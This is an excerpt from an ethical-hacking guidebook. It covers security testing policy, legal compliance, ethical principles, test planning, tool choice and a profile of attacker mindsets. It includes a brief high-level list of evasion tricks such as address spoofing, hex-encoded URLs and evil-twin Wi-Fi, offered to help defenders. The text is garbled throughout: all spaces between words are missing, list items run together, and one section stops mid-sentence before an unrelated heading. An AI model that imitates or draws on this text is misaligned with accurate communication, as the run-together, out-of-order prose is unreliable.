PolicyconsiderationsIfyouchoosetomakeethicalhackinganimportantpartofyourbusiness’sinformationriskmanagementprogram,youreallyneedtohaveadocumentedsecuritytestingpolicy.Suchapolicyoutlineswho’sdoingthetesting,thegeneraltypeoftestingthatisperformed,andhowoftenthetestingtakesplace.SpecificproceduresforcarryingoutyoursecuritytestscouldoutlinethemethodologiesIcoverinthisbook.Youmightalsoconsidercreatingasecuritystandardsdocumentthatoutlinesthespecificsecuritytestingtoolsthatareusedandspecificpeopleperformingthetesting.Youmightalsoliststandardtestingdates,suchasonceperquarterforexternalsystemsandbiannualtestsforinternalsystems—whateverworksforyourbusiness.
ComplianceandregulatoryconcernsYourowninternalpoliciesmightdictatehowmanagementviewssecuritytesting,butyoualsoneedtoconsiderthestate,federal,andinternationallawsandregulationsthataffectyourbusiness.Inparticular,theDigitalMillenniumCopyrightAct(DMCA)sendschillsdownthespinesoflegitimateresearchers.Seewww.eff.org/issues/dmcaforeverythingtheDMCAhastooffer.
ManyofthefederallawsandregulationsintheUnitedStates—suchastheHealthInsurancePortabilityandAccountabilityAct(HIPAA),HealthInformationTechnologyforEconomicandClinicalHealth(HITECH)Act,Gramm-Leach-BlileyAct(GLBA),NorthAmericanElectricReliabilityCorporation(NERC)CriticalInfrastructureProtection(CIP)requirements,andPCIDSS—requirestrongsecuritycontrolsandconsistentsecurityevaluations.RelatedinternationallawssuchastheCanadianPersonalInformationProtectionandElectronicDocumentsAct(PIPEDA),theEuropeanUnion’sDataProtectionDirective,andJapan’sPersonalInformationProtectionAct(JPIPA)arenodifferent.Incorporatingyoursecuritytestsintothesecompliancerequirementsisagreatwaytomeetthestateandfederalregulationsand
UnderstandingtheNeedtoHackYourOwnSystems
Tocatchathief,youmustthinklikeathief.That’sthebasisforethicalhacking.Knowingyourenemyisabsolutelycritical.Thelawofaveragesworksagainstsecurity.Withtheincreasednumberofhackersandtheirexpandingknowledge,andthegrowingnumberofsystemvulnerabilitiesandotherunknowns,eventuallyallcomputersystemsandapplicationswillbehackedorcompromisedinsomeway.Protectingyoursystemsfromthebadguys—andnotjustthegenericvulnerabilitiesthateveryoneknowsabout—isabsolutelycritical.Whenyouknowhackertricks,youfindouthowvulnerableyoursystemsreallyare.
Hackingpreysonweaksecuritypracticesandundisclosedvulnerabilities.Moreandmoreresearch,suchastheannualVerizonDataBreachInvestigationsReport(www.verizonenterprise.com/DBIR),isshowingthatlong-standing,knownvulnerabilitiesarealsobeingtargeted.Firewalls,encryption,andpasswordscancreateafalsefeelingofsafety.Thesesecuritysystemsoftenfocusonhigh-levelvulnerabilities,suchasbasicaccesscontrol,withoutaffectinghowthebadguyswork.Attackingyourownsystemstodiscovervulnerabilities—especiallythelow-hangingfruitthatgetssomanypeopleintotrouble—helpsmakethemmoresecure.Ethicalhackingisaprovenmethodofgreatlyhardeningyoursystemsfromattack.Ifyoudon’tidentifyweaknesses,it’sonlyamatteroftimebeforethevulnerabilitiesareexploited.
Ashackersexpandtheirknowledge,soshouldyou.Youmustthinklikethemandworklikethemtoprotectyoursystemsfromthem.Astheethicalhacker,youmustknowtheactivitiesthathackerscarryoutandhowtostoptheirefforts.Knowingwhattolookforandhowtousethatinformationhelpsyoutothwarthackers’efforts.
Youdon’thavetoprotectyoursystemsfromeverything.Youcan’t.Theonlyprotectionagainsteverythingistounplugyourcomputersystemsandlockthemawaysonoonecantouchthem—notevenyou.Butdoingsoisnotthebestapproachtoinformationsecurity,andit’scertainlynotgoodforbusiness!What’simportantistoprotectyoursystemsfromknownvulnerabilitiesandcommonattacks,whichhappentobesomeofthemostoverlookedweaknessesinmostorganizations.
Anticipatingallthepossiblevulnerabilitiesyou’llhaveinyoursystemsandbusinessprocessesisimpossible.Youcertainlycan’tplanforalltypesofattacks—especiallytheunknownones.However,themorecombinationsyoutryandthemoreyoutestwholesystemsinsteadofindividualunits,thebetteryourchancesareofdiscoveringvulnerabilitiesthataffectyourinformationsystemsintheirentirety.
Don’ttakeyoursecuritytestingtoofar,though;hardeningyoursystemsfromunlikelyattacksmakeslittlesense.Forinstance,ifyoudon’thavealotoffoottrafficinyour
officeandnointernalwebserverrunning,youmightnothaveasmuchtoworryaboutasacloudserviceprovidermighthave.
Youroverallgoalsforsecuritytestingareto
Prioritizeyoursystemssoyoucanfocusyoureffortsonwhatmatters.Hackyoursystemsinanondestructivefashion.Enumeratevulnerabilitiesand,ifnecessary,provetomanagementthatvulnerabilitiesexistandcanbeexploited.Applyresultstoremovethevulnerabilitiesandbettersecureyoursystems.
UnderstandingtheDangersYourSystemsFace
It’sonethingtoknowgenerallythatyoursystemsareunderfirefromhackersaroundtheworldandmalicioususersaroundtheoffice;it’sanothertounderstandthespecificattacksagainstyoursystemsthatarepossible.Thissectiondiscussessomewell-knownattacksbutisbynomeansacomprehensivelisting.
Manysecurityvulnerabilitiesaren’tcriticalbythemselves.However,exploitingseveralvulnerabilitiesatthesametimecantakeitstollonasystemornetworkenvironment.Forexample,adefaultWindowsOSconfiguration,aweakSQLServeradministratorpassword,oraserverhostedonawirelessnetworkmightnotbemajorsecurityconcernsbythemselves—butsomeoneexploitingallthreeofthesevulnerabilitiesatthesametimecouldleadtosensitiveinformationdisclosureandmore.
Complexityistheenemyofsecurity.
Thepossiblevulnerabilitiesandattackshavegrownenormouslyinrecentyearsbecauseofvirtualization,cloudcomputing,andevensocialmedia.ThesethreethingsalonehaveaddedimmeasurablecomplexitytoyourITenvironment.
NontechnicalattacksExploitsthatinvolvemanipulatingpeople—endusersandevenyourself—arethegreatestvulnerabilitywithinanycomputerornetworkinfrastructure.Humansaretrustingbynature,whichcanleadtosocialengineeringexploits.Socialengineeringistheexploitationofthetrustingnatureofhumanbeingstogaininformation—oftenviae-mailphishing—formaliciouspurposes.CheckoutChapter6formoreinformationaboutsocialengineeringandhowtoguardyoursystemsagainstit.
Othercommonandeffectiveattacksagainstinformationsystemsarephysical.Hackersbreakintobuildings,computerrooms,orotherareascontainingcriticalinformationorpropertytostealcomputers,servers,andothervaluableequipment.Physicalattackscanalsoincludedumpsterdiving—rummagingthroughtrashcansanddumpstersforintellectualproperty,passwords,networkdiagrams,andotherinformation.
NetworkinfrastructureattacksAttacksagainstnetworkinfrastructurescanbeeasytoaccomplishbecausemanynetworkscanbereachedfromanywhereintheworldviatheInternet.Someexamplesofnetworkinfrastructureattacksincludethefollowing:
Connectingtoanetworkthroughanunsecuredwirelessaccesspointattachedbehindafirewall
Exploitingweaknessesinnetworkprotocols,suchasTCP/IPandSecureSocketsLayer(SSL)Floodinganetworkwithtoomanyrequests,creatingadenialofservice(DoS)forlegitimaterequestsInstallinganetworkanalyzeronanetworksegmentandcapturingeverypacketthattravelsacrossit,revealingconfidentialinformationincleartext
OperatingsystemattacksHackinganoperatingsystem(OS)isapreferredmethodofthebadguys.OSattacksmakeupalargeportionofattackssimplybecauseeverycomputerhasanoperatingsystem,andOSesaresusceptibletomanywell-knownexploits,includingvulnerabilitiesthatremainunpatchedyearslater.
Occasionally,someoperatingsystemsthattendtobemoresecureoutofthebox—suchastheold-but-still-out-thereNovellNetWare,OpenBSD,andIBMSeriesi—areattacked,andvulnerabilitiesturnup.ButhackerstendtopreferattackingWindows,Linux,and,morerecently,MacOSX,becausethey’remorewidelyused.
Herearesomeexamplesofattacksonoperatingsystems:
ExploitingmissingpatchesAttackingbuilt-inauthenticationsystemsBreakingfilesystemsecurityCrackingpasswordsandweakencryptionimplementations
ApplicationandotherspecializedattacksApplicationstakealotofhitsbyhackers.Programs(suchase-mailserversoftwareandwebapplications)areoftenbeatendown.Forexample:
HypertextTransferProtocol(HTTP)andSimpleMailTransferProtocol(SMTP)applicationsarefrequentlyattackedbecausemostfirewallsandothersecuritymechanismsareconfiguredtoallowfullaccesstotheseservicestoandfromtheInternet,evenwhenrunningwithSSL(yuck!)orTransportLayerSecurity(TLS)encryption.Mobileappsfaceincreasingattacksgiventheirprevalenceinbusinesssettings.Unsecuredfilescontainingsensitiveinformationarescatteredacrossworkstationandservershares.Databasesystemsalsocontainnumerousvulnerabilitiesthatmalicioususerscanexploit.
ObeyingtheEthicalHackingPrinciplesSecurityprofessionalsmustcarryoutthesameattacksagainstcomputersystems,physicalcontrols,andpeoplethatmalicioushackersdo.(Iintroducethoseattacksintheprecedingsection.)Asecurityprofessional’sintent,however,istohighlightanyassociatedweaknesses.PartsIIthroughVofthisbookcoverhowyoumightproceedwiththeseattacksindetail,alongwithspecificcountermeasuresyoucanimplementagainstattacksagainstyourbusiness.
Toensurehisorhersecuritytestingisperformedadequatelyandprofessionally,everysecurityprofessionalmustabidebyafewbasictenets.Thefollowingsectionsintroducetheprinciplesyouneedtofollow.
Ifyoudon’theedthefollowingprinciples,badthingscanhappen.I’veseenthemignoredorforgottenwhenplanningorexecutingsecuritytests.Theresultsweren’tpositive—trustme.
WorkingethicallyThewordethicalinthiscontextmeansworkingwithhighprofessionalmoralsandvalues.Whetheryou’reperformingsecuritytestsagainstyourownsystemsorforsomeonewhohashiredyou,everythingyoudomustbeaboveboardinsupportofthecompany’sgoals.Nohiddenagendasallowed!Thisalsoincludesreportingallyourfindingsregardlessofwhetherornotitwillcreatepoliticalbacklash.
Trustworthinessistheultimatetenet.It’salsothebestwaytoget(andkeep)peopleonyoursideinsupportofyoursecurityprogram.Themisuseofinformationisabsolutelyforbidden.That’swhatthebadguysdo.Letthemreceiveafineorgotoprisonbecauseoftheirpoorchoices.Keepinmindthatyoucanbeethicalbutnottrustworthyandviceversa,alongthelinesofEdwardSnowden.
RespectingprivacyTreattheinformationyougatherwiththeutmostrespect.Allinformationyouobtainduringyourtesting—fromwebapplicationflawstocleartexte-mailpasswordstopersonallyidentifiableinformation(PII)andbeyond—mustbekeptprivate.Nothinggoodcancomeofsnoopingintoconfidentialcorporateinformationoremployees’privatelives.
Involveothersinyourprocess.Employawatch-the-watchersystemthatcanhelpbuildtrustandsupportforyoursecurityassessmentprojects.Documentationiskeysodocument,document,document!
NotcrashingyoursystemsOneofthebiggestmistakesI’veseenpeoplemakewhentryingtotesttheirownsystemsisinadvertentlycrashingthesystemsthey’retryingtokeeprunning.Itdoesn’thappenasmuchisitusedto,giventheresiliencyoftoday’ssystems.However,poorplanningandtimingcanhavenegativeconsequences.
Althoughit’snotlikely,youcancreateDoSconditionsonyoursystemswhentesting.Runningtoomanyteststooquicklycancausesystemlockups,datacorruption,reboots,andmore.Thisisespeciallytruewhentestingwebsitesandapplications.Ishouldknow:I’vedoneit!Don’trushandassumethatanetworkorspecifichostcanhandlethebeatingthatnetworktoolsandvulnerabilityscannerscandishout.
Youcanevenaccidentallycreateanaccountlockoutorasystemlockoutconditionbyusingvulnerabilityscannersorbysociallyengineeringsomeoneintochangingapassword,notrealizingtheconsequencesofyouractions.Proceedwithcautionandcommonsense.Eitherway,beityouorsomeoneelse,theseweaknessesstillexist,andit’sbetterthatyoudiscoverthemfirst!
Manyvulnerabilityscannerscancontrolhowmanytestsareperformedonasystematthesametime.Thesesettingsareespeciallyhandywhenyouneedtorunthetestsonproductionsystemsduringregularbusinesshours.Don’tbeafraidtothrottlebackyourscans.Itwilltakelongertocompleteyourtesting,butitcansaveyoualotofgrief.
UsingtheEthicalHackingProcessLikepracticallyanyITorsecurityproject,youneedtoplanyoursecuritytesting.It’sbeensaidthatactionwithoutplanningisattherootofeveryfailure.Strategicandtacticalissuesintheethicalhackingprocessneedtobedeterminedandagreedupon.Toensurethesuccessofyourefforts,spendtimeupfrontplanningforanyamountoftesting—fromasimpleOSpassword-crackingtestagainstafewserverstoanall-outvulnerabilityassessmentofawebenvironment.
Ifyouchoosetohirea“reformed”hackertoworkwithyouduringyourtestingortoobtainanindependentperspective,becareful.Icovertheprosandcons,andthedo’sanddon’tsassociatedwithhiringtrustedandno-so-trustedethicalhackingresourcesinChapter19.
FormulatingyourplanGettingapprovalforsecuritytestingisessential.Makesurethatwhatyou’redoingisknownandvisible—atleasttothedecisionmakers.Obtainingsponsorshipoftheprojectisthefirststep.Thisishowyourtestingobjectiveswillbedefined.Sponsorshipcouldcomefromyourmanager,anexecutive,yourclient,orevenyourselfifyou’retheboss.Youneedsomeonetobackyouupandsignoffonyourplan.Otherwise,yourtestingmightbecalledoffunexpectedlyifsomeone(includingthirdpartiessuchascloudserviceandhostingproviders)claimsyouwereneverauthorizedtoperformthetests.Evenworse,yougetfiredorchargedwithcriminalactivity—ithashappened!
Theauthorizationcanbeassimpleasaninternalmemoorane-mailfromyourbosswhenyouperformthesetestsonyourownsystems.Ifyou’retestingforaclient,haveasignedcontractstatingtheclient’ssupportandauthorization.Getwrittenapprovalonthissponsorshipassoonaspossibletoensurethatnoneofyourtimeoreffortiswasted.Thisdocumentationisyour“GetOutofJailFree”cardifanyonesuchasyourInternetServiceProvider(ISP),cloudserviceprovider,orrelatedvendorquestionswhatyou’redoing,orworse,iftheauthoritiescomecalling.Don’tlaugh—itwouldn’tbethefirsttimeithashappened.
Oneslipcancrashyoursystems—notnecessarilywhatanyonewants.Youneedadetailedplan,butthatdoesn’tmeanyouneedvolumesoftestingprocedurestomakethingsoverlycomplex.Awell-definedscopeincludesthefollowinginformation:
Specificsystemstobetested:Whenselectingsystemstotest,startwiththemostcriticalsystemsandprocessesortheonesyoususpectarethemostvulnerable.Forinstance,youcantestserverOSpasswords,testanInternet-facingwebapplication,orattemptsocialengineeringviae-mailphishingbeforedrillingdownintoallyoursystems.
Risksinvolved:Haveacontingencyplanforyourethicalhackingprocessincase
somethinggoesawry.Whatifyou’reassessingyourfirewallorwebapplicationandyoutakeitdown?Thiscancausesystemunavailability,whichcanreducesystemperformanceoremployeeproductivity.Evenworse,itmightcauselossofdataintegrity,lossofdataitself,andevenbadpublicity.It’llmostcertainlytickoffapersonortwoandmakeyoulookbad.
HandlesocialengineeringandDoSattackscarefully.Determinehowtheyaffectthepeopleandsystemsyoutest.
Datesthetestswillbeperformedandyouroveralltimeline:Determiningwhenthetestsareperformedissomethingyoumustthinklongandhardabout.Doyouperformtestsduringnormalbusinesshours?Howaboutlateatnightorearlyinthemorningsothatproductionsystemsaren’taffected?Involveotherstomakesuretheyapproveofyourtiming.
YoumaygetpushbackandsufferDoS-relatedconsequences,butthebestapproachisanunlimitedattack,whereanytypeoftestispossibleatanytimeofday.Thebadguysaren’tbreakingintoyoursystemswithinalimitedscope,sowhyshouldyou?SomeexceptionstothisapproachareperformingalloutDoSattacks,socialengineering,andphysicalsecuritytests.
Whetherornotyouintendtobedetected:Oneofyourgoalsmightbetoperformthetestswithoutbeingdetected.Forexample,youmightperformyourtestsonremotesystemsoronaremoteofficeandyoumightnotwanttheuserstobeawareofwhatyou’redoing.Otherwise,theusersorITstaffmightcatchontoyouandbeontheirbestbehavior—insteadoftheirnormalbehavior.
Knowledgeofthesystemsyouhavebeforeyoustarttesting:Youdon’tneedextensiveknowledgeofthesystemsyou’retesting—justabasicunderstanding.Thisbasicunderstandinghelpsprotectyouandthetestedsystems.
Understandingthesystemsyou’retestingshouldn’tbedifficultifyou’rehackingyourownin-housesystems.Ifyou’retestingaclient’ssystems,youmayhavetodigdeeper.Infact,I’veonlyhadoneortwoclientsaskforafullyblindassessment.MostITmanagersandothersresponsibleforsecurityarescaredoftheseassessments—andtheycantakemoretime,costmore,andbelesseffective.Basethetypeoftestyouperformonyourorganization’sorclient’sneeds.
Actionsyouwilltakewhenamajorvulnerabilityisdiscovered:Don’tstopafteryoufindoneortwosecurityholes.Keepgoingtoseewhatelseyoucandiscover.I’mnotsayingtokeephackinguntiltheendoftimeoruntilyoucrashallyoursystems;ain’tnobodygottimeforthat!Instead,simplypursuethepathyou’regoingdownuntilyoujustcan’thackitanylonger(punintended).Ifyouhaven’tfoundanyvulnerabilities,youhaven’tlookedhardenough.They’rethere.Ifyouuncoversomethingbig,youneedtosharethatinformationwiththekeyplayers(developers,DBAs,ITmanagers,andsoon)assoonaspossibletoplugthehole
beforeit’sexploited.Thespecificdeliverables:Thisincludesvulnerabilityscannerreportsandyourowndistilledreportoutliningtheimportantvulnerabilitiestoaddress,alongwithrecommendationsandcountermeasurestoimplement.
SelectingtoolsAswithanyproject,ifyoudon’thavetherighttoolsforyoursecuritytesting,youwillhavedifficultyaccomplishingthetaskeffectively.Havingsaidthat,justbecauseyouusetherighttoolsdoesn’tmeanthatyou’lldiscoveralltherightvulnerabilities.Experiencecounts.
Knowthelimitationsofyourtools.Manyvulnerabilityscannersgeneratefalsepositivesandnegatives(incorrectlyidentifyingvulnerabilities).Othersjustskiprightovervulnerabilitiesaltogether.Incertainsituations,likewhentestingwebapplications,you’llnodoubthavetorunmultiplevulnerabilityscannerstofindallofthevulnerabilities.
Manytoolsfocusonspecifictests,andnotoolcantestforeverything.Forthesamereasonthatyouwouldn’tdriveanailwithascrewdriver,don’tuseaportscannertouncoverspecificnetworkvulnerabilities.Thisiswhyyouneedasetofspecifictoolsforthetask.Themore(andbetter)toolsyouhave,theeasieryourethicalhackingeffortsare.
Makesureyou’reusingtherighttoolforthetask:
Tocrackpasswords,youneedcrackingtools,suchasOphcrackandProactivePasswordAuditor.Foranin-depthanalysisofawebapplication,awebvulnerabilityscanner(suchasNetsparker,AcunetixWebVulnerabilityScanner,orAppSpider)ismoreappropriatethananetworkanalyzer(suchasWiresharkorOmniPeek).
Whenselectingtherightsecuritytoolforthetask,askaround.GetadvicefromyourcolleaguesandfromotherpeopleonlineviaGoogle,LinkedIn,andTwitter.Hundreds,ifnotthousands,oftoolscanbeusedforyoursecuritytests.Thefollowinglistrunsdownsomeofmyfavoritecommercial,freeware,andopensourcesecuritytools:
Cain&AbelOmniPeekNexpose
NetsparkerElcomsoftProactiveSystemPasswordRecoveryMetasploitGFILanGuardCommViewforWiFi
IdiscussthesetoolsandmanyothersinPartsIIthroughVwhenIgointothespecifictests.TheAppendixcontainsamorecomprehensivelistingofthesetoolsforyourreference.
Thecapabilitiesofmanysecurityandhackingtoolsareoftenmisunderstood.Thismisunderstandinghascastanegativelightonotherwiseexcellentandlegitimatetools.Evengovernmentagenciesaroundtheworldaretalkingaboutmakingthemillegal!Partofthismisunderstandingisduetothecomplexityofmanysecuritytestingtools.Whichevertoolsyouuse,familiarizeyourselfwiththembeforeyoustartusingthem.Thatway,you’repreparedtousethetoolsinthewaysthey’reintendedtobeused.Herearewaystodothat:
Readthereadmeand/oronlineHelpfilesandFAQs.Studytheuserguides.Usethetoolsinalabortestenvironment.WatchtutorialvideosonYouTube(ifyoucanbearthepoorproductiononmostofthem).Considerformalclassroomtrainingfromthesecuritytoolvendororanotherthird-partytrainingprovider,ifavailable.
Lookforthesecharacteristicsintoolsforsecuritytesting:
AdequatedocumentationDetailedreportsonthediscoveredvulnerabilities,includinghowtheymightbeexploitedandfixedGeneralindustryacceptanceAvailabilityofupdatesandresponsivenessoftechnicalsupportHigh-levelreportsthatcanbepresentedtomanagersornontechnicaltypes(Thisisespeciallyimportantintoday’saudit-andcompliance-drivenworld!)
Thesefeaturescansaveyouatonoftimeandeffortwhenyou’reperformingyourtestsandwritingyourfinalreports.
ExecutingtheplanGoodsecuritytestingtakespersistence.Timeandpatienceareimportant.Also,be
carefulwhenyou’reperformingyourethicalhackingtests.Acriminalonyournetworkoraseeminglybenignemployeelookingoveryourshouldermightwatchwhat’sgoingonandusethisinformationagainstyouoryourbusiness.
Makingsurethatnohackersareonyoursystemsbeforeyoustartisn’tpractical.Besureyoukeepeverythingasquietandprivateaspossible.Thisisespeciallycriticalwhentransmittingandstoringyourtestresults.Ifpossible,encryptanye-mailsandfilescontainingsensitivetestinformationviaanencryptedZipfile,orcloud-basedfilesharingservice.
You’renowonareconnaissancemission.Harnessasmuchinformationaspossibleaboutyourorganizationandsystems,muchlikemalicioushackersdo.Startwithabroadviewandnarrowyourfocus:
1. SearchtheInternetforyourorganization’sname,yourcomputerandnetworksystemnames,andyourIPaddresses.
Googleisagreatplacetostart.
2. Narrowyourscope,targetingthespecificsystemsyou’retesting.
Whetheryou’reassessingphysicalsecuritystructuresorwebapplications,acasualassessmentcanturnupalotofinformationaboutyoursystems.
3. Furthernarrowyourfocuswithamorecriticaleye.Performactualscansandotherdetailedteststouncovervulnerabilitiesonyoursystems.
4. Performtheattacksandexploitanyvulnerabilitiesyoufindifthat’swhatyouchoosetodo.
CheckoutChapters4and5tofindoutmoreinformationandtipsonthisprocess.
EvaluatingresultsAssessyourresultstoseewhatyou’veuncovered,assumingthatthevulnerabilitieshaven’tbeenmadeobviousbeforenow.Thisiswhereknowledgecounts.Yourskillatevaluatingtheresultsandcorrelatingthespecificvulnerabilitiesdiscoveredwillgetbetterwithpractice.You’llendupknowingyoursystemsmuchbetterthananyoneelse.Thismakestheevaluationprocessmuchsimplermovingforward.
Submitaformalreporttomanagementortoyourclient,outliningyourresultsandanyrecommendationsyouneedtoshare.Keepthesepartiesinthelooptoshowthatyoureffortsandtheirmoneyarewellspent.Chapter17describestheethicalhackingreportingprocess.
MovingonWhenyoufinishyoursecuritytests,you(oryourclient)stillneedtoimplementyour
recommendationstomakesurethesystemsaresecure.Otherwise,allthetime,money,andeffortspentonethicalhackinggoestowaste.Sadly,Iseethisveryscenariofairlyoften.
Newsecurityvulnerabilitiescontinuallyappear.Informationsystemsconstantlychangeandbecomemorecomplex.Newsecurityvulnerabilitiesandexploitsareregularlyuncovered.Vulnerabilityscannersgetbetterandbetter.Securitytestsareasnapshotofthesecuritypostureofyoursystems.Atanytime,everythingcanchange,especiallyafterupgradingsoftware,addingcomputersystems,orapplyingpatches.Thisunderscorestheneedtoupdateyourtools,beforeeachuseifpossible.Plantotestregularlyandconsistently(forexample,onceamonth,onceaquarter,orbiannually).Chapter19coversmanagingsecuritychangesasyoumoveforward.
CrackingtheHackerMindsetInThisChapter
Understandingtheenemy
Profilinghackersandmalicioususers
Understandingwhyattackersdowhattheydo
Examininghowattackersgoabouttheirbusiness
Beforeyoustartassessingthesecurityofyoursystems,it’sgoodtoknowafewthingsaboutthepeopleyou’reupagainst.Manyinformationsecurityproductvendorsandotherprofessionalsclaimthatyoushouldprotectyoursystemsfromthebadguys—bothinternalandexternal.Butwhatdoesthismean?Howdoyouknowhowthesepeoplethinkandexecutetheirattacks?
Knowingwhathackersandmalicioususerswanthelpsyouunderstandhowtheywork.Understandinghowtheyworkhelpsyoutolookatyourinformationsystemsinawholenewway.Inthischapter,Idescribethechallengesyoufacefromthepeopleactuallydoingthemisdeedsaswellastheirmotivationsandmethods.Thisunderstandingbetterpreparesyouforyoursecuritytests.
WhatYou’reUpAgainstThankstosensationalisminthemedia,publicperceptionofhackerhastransformedfromharmlesstinkerertomaliciouscriminal.Nevertheless,hackersoftenstatethatthepublicmisunderstandsthem,whichismostlytrue.It’seasytoprejudgewhatyoudon’tunderstand.Unfortunately,manyhackerstereotypesarebasedonmisunderstandingratherthanfact,andthatmisunderstandingfuelsaconstantdebate.
Hackerscanbeclassifiedbyboththeirabilitiesandtheirunderlyingmotivations.Someareskilled,andtheirmotivationsarebenign;they’remerelyseekingmoreknowledge.Attheotherendofthespectrum,hackerswithmaliciousintentseeksomeformofpersonal,political,oreconomicgain.Unfortunately,thenegativeaspectsofhackingusuallyovershadowthepositiveaspectsandpromotethenegativestereotypes.
Historically,hackershackedforthepursuitofknowledgeandthethrillofthechallenge.Scriptkiddies(hackerwannabeswithlimitedskills)aside,traditionalhackersareadventurousandinnovativethinkersandarealwaysdevisingnewwaystoexploitcomputervulnerabilities.(Formoreonscriptkiddies,seethesection,“WhoBreaksintoComputerSystems,”laterinthischapter.)Hackersseewhatothersoftenoverlook.Theyhaveatremendousamountof“situationalawareness.”Theywonderwhatwouldhappenifacablewasunplugged,aswitchwasflipped,orlinesofcodewerechangedinaprogram.Theseold-schoolhackersarelikeTim“TheToolman”Taylor—TimAllen’scharacterontheclassicsitcomHomeImprovement—thinkingtheycanimproveelectronicandmechanicaldevicesby“rewiringthem.”
Whentheyweregrowingup,hackers’rivalsweremonstersandvillainsonvideogamescreens.Nowhackersseetheirelectronicfoesasonlythat—electronic.Hackerswhoperformmaliciousactsdon’treallythinkaboutthefactthathumanbeingsarebehindthefirewalls,wirelessnetworks,andwebapplicationsthey’reattacking.Theyignorethattheiractionsoftenaffectthosehumanbeingsinnegativeways,suchasjeopardizingtheirjobsecurityandputtingtheirpersonalsafetyatrisk.Government-backedhacking?Well,that’sadifferentstoryastheyaremakingcalculateddecisionstodothesethings.
Ontheflipside,oddsaregoodthatyouhaveatleastahandfulofemployees,contractors,interns,orconsultantswhointendtocompromisesensitiveinformationonyournetworkformaliciouspurposes.Thesepeopledon’thackinthewaypeoplenormallysuppose.Instead,theyrootaroundinfilesonservershares;delveintodatabasestheyknowtheyshouldn’tbein;andsometimessteal,modify,anddeletesensitiveinformationtowhichtheyhaveaccess.Thisbehaviorisoftenveryhardtodetect—especiallygiventhewidespreadbeliefbymanagementthatuserscanandshouldbetrustedtodotherightthings.Thisactivityisperpetuatediftheseuserspassedtheircriminalbackgroundandcreditchecksbeforetheywerehired.Pastbehaviorisoftenthebestpredictoroffuturebehavior,butjustbecausesomeonehasacleanrecordandauthorizationtoaccesssensitivesystemsdoesn’tmeanheorshewon’tdoanythingbad.Criminalbehaviorhastostartsomewhere!
Asnegativeasbreakingintocomputersystemsoftencanbe,hackersandresearchersplaykeyrolesintheadvancementoftechnology.Inaworldwithoutthesepeople,oddsaregoodthatthelatestintrusionpreventiontechnology,datalossprevention(DLP),orvulnerabilityscanningandexploittoolswouldlikelybedifferent,iftheyevenexistedatall.Suchaworldmaynotbebad,buttechnologydoeskeepsecurityprofessionalsemployedandkeepthefieldmovingforward.Unfortunately,thetechnicalsecuritysolutionscan’twardoffallmaliciousattacksandunauthorizedusebecausehackersand(sometimes)malicioususersareusuallyafewstepsaheadofthetechnologydesignedtoprotectagainsttheirwaywardactions.
Howeveryouviewthestereotypicalhackerormalicioususer,onethingiscertain:Somebodywillalwaystrytotakedownyourcomputersystemsandcompromiseinformationbypokingandproddingwhereheorsheshouldn’t,throughdenialofservice(DoS)attacksorbycreatingandlaunchingmalware.Youmusttaketheappropriatestepstoprotectyoursystemsagainstthiskindofintrusion.
ThinkinglikethebadguysMaliciousattackersoftenthinkandworklikethieves,kidnappers,andotherorganizedcriminalsyouhearaboutinthenewseveryday.Thesmartonesconstantlydevisewaystoflyundertheradarandexploiteventhesmallestweaknessesthatleadthemtotheirtarget.Thefollowingareexamplesofhowhackersandmalicioususersthinkandwork.Thislistisn’tintendedtohighlightspecificexploitsthatIcoverinthisbookorteststhatIrecommendyoucarryout,butrathertodemonstratethecontextandapproachofamaliciousmindset:
EvadinganintrusionpreventionsystembychangingtheirMACaddressorIPaddresseveryfewminutestogetfurtherintoanetworkwithoutbeingcompletelyblocked
Exploitingaphysicalsecurityweaknessbybeingawareofofficesthathavealreadybeencleanedbythecleaningcrewandareunoccupied(andthuseasytoaccesswithlittlechanceofgettingcaught),whichmightbemadeobviousby,forinstance,thefactthattheofficeblindsareopenedandthecurtainsarepulledshutintheearlymorning
Bypassingwebaccesscontrolsbychangingamalicioussite’sURLtoitsdotteddecimalIPaddressequivalentandthenconvertingittohexadecimalforuseinthewebbrowser
UsingunauthorizedsoftwarethatwouldotherwisebeblockedatthefirewallbychangingthedefaultTCPportthatitrunson
Settingupawireless“eviltwin”nearalocalWi-FihotspottoenticeunsuspectingInternetsurfersontoaroguenetworkwheretheirinformationcanbecapturedandeasilymanipulated
Usinganoverly-trustingcolleague’suserIDandpasswordtogainaccesstosensitiveinformationthatwouldotherwisebehighlyimprobabletoobtain
UnpluggingthepowercordorEthernetconnectiontoanetworkedsecuritycamerathatmonitorsaccesstothecomputerroomorothersensitiveareasandsubsequentlygainingunmonitorednetworkaccess
PerformingSQLinjectionorpasswordcrackingagainstawebsiteviaaneighbor’sunprotectedwirelessnetworkinordertohidethemalicioususer’sownidentity
Malicioushackersoperateincountlessways,andthislistpresentsonlyasmallnumberofthetechniqueshackersmayuse.ITandsecurityprofessionalsneedtothinkandworkthiswayinordertoreallydiginandfindsecurityvulnerabilitiesthatmaynototherwisebeuncovered.
WhoBreaksintoComputerSystemsComputerhackershavebeenaroundfordecades.SincetheInternetbecamewidelyusedinthe1990s,themainstreampublichasstartedtohearmoreandmoreabouthacking.Onlyafewhackers,suchasJohnDraper(alsoknownasCaptainCrunch)andKevinMitnick,arereallywellknown.Manymoreunknownhackersarelookingtomakeanameforthemselves.They’retheonesyouhavetolookoutfor.
Inaworldofblackandwhite,describingthetypicalhackeriseasy.Thehistoricalstereotypeofahackerisanantisocial,pimplyfaced,teenageboy.Buttheworldhasmanyshadesofgrayandmanytypesofpeopledoingthehacking.Hackersareuniqueindividuals,soanexactprofileishardtooutline.Thebestbroaddescriptionofhackersisthatallhackersaren’tequal.Eachhackerhashisorherownuniquemotives,methods,andskills.Hackerskilllevelsfallintothreegeneralcategories:
Scriptkiddies:Thesearecomputernoviceswhotakeadvantageoftheexploittools,vulnerabilityscanners,anddocumentationavailablefreeontheInternetbutwhodon’thaveanyrealknowledgeofwhat’sreallygoingonbehindthescenes.Theyknowjustenoughtocauseyouheadachesbuttypicallyareverysloppyintheiractions,leavingallsortsofdigitalfingerprintsbehind.Eventhoughtheseguysareoftenthestereotypicalhackersthatyouhearaboutinthenewsmedia,theyneedonlyminimalskillstocarryouttheirattacks.
